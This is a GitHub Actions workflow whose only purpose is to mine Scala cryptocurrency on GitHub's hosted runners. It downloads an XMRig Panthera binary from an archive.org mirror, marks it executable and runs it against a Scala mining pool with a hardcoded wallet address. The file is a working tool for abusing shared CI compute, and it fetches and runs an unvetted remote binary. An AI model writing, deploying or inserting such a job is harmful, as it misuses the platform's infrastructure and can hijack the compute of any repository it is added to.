name: Mine Scala via GitHub Actions

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install -y wget tar

    - name: Download XMRig Panthera (mirror)
      run: |
        wget https://archive.org/download/xmrig-panthera-linux/xmrig-panthera-linux.tar.gz
        tar -xvzf xmrig-panthera-linux.tar.gz
        cd xmrig-panthera
        chmod +x xmrig

    - name: Start Mining
      run: |
        cd xmrig-panthera
        ./xmrig -o pool.scalaproject.io:2019 -u Ssy2SFtR3rGfjKFA4xxUnGVikpSy7GyfTFbDmjyqSGsuJMJ4K2GSKyK6pApbCy7DBGgf6b5p3fHwV1zHrnVRUjDG7kdm496A8R -p github -a panthera -k --tls
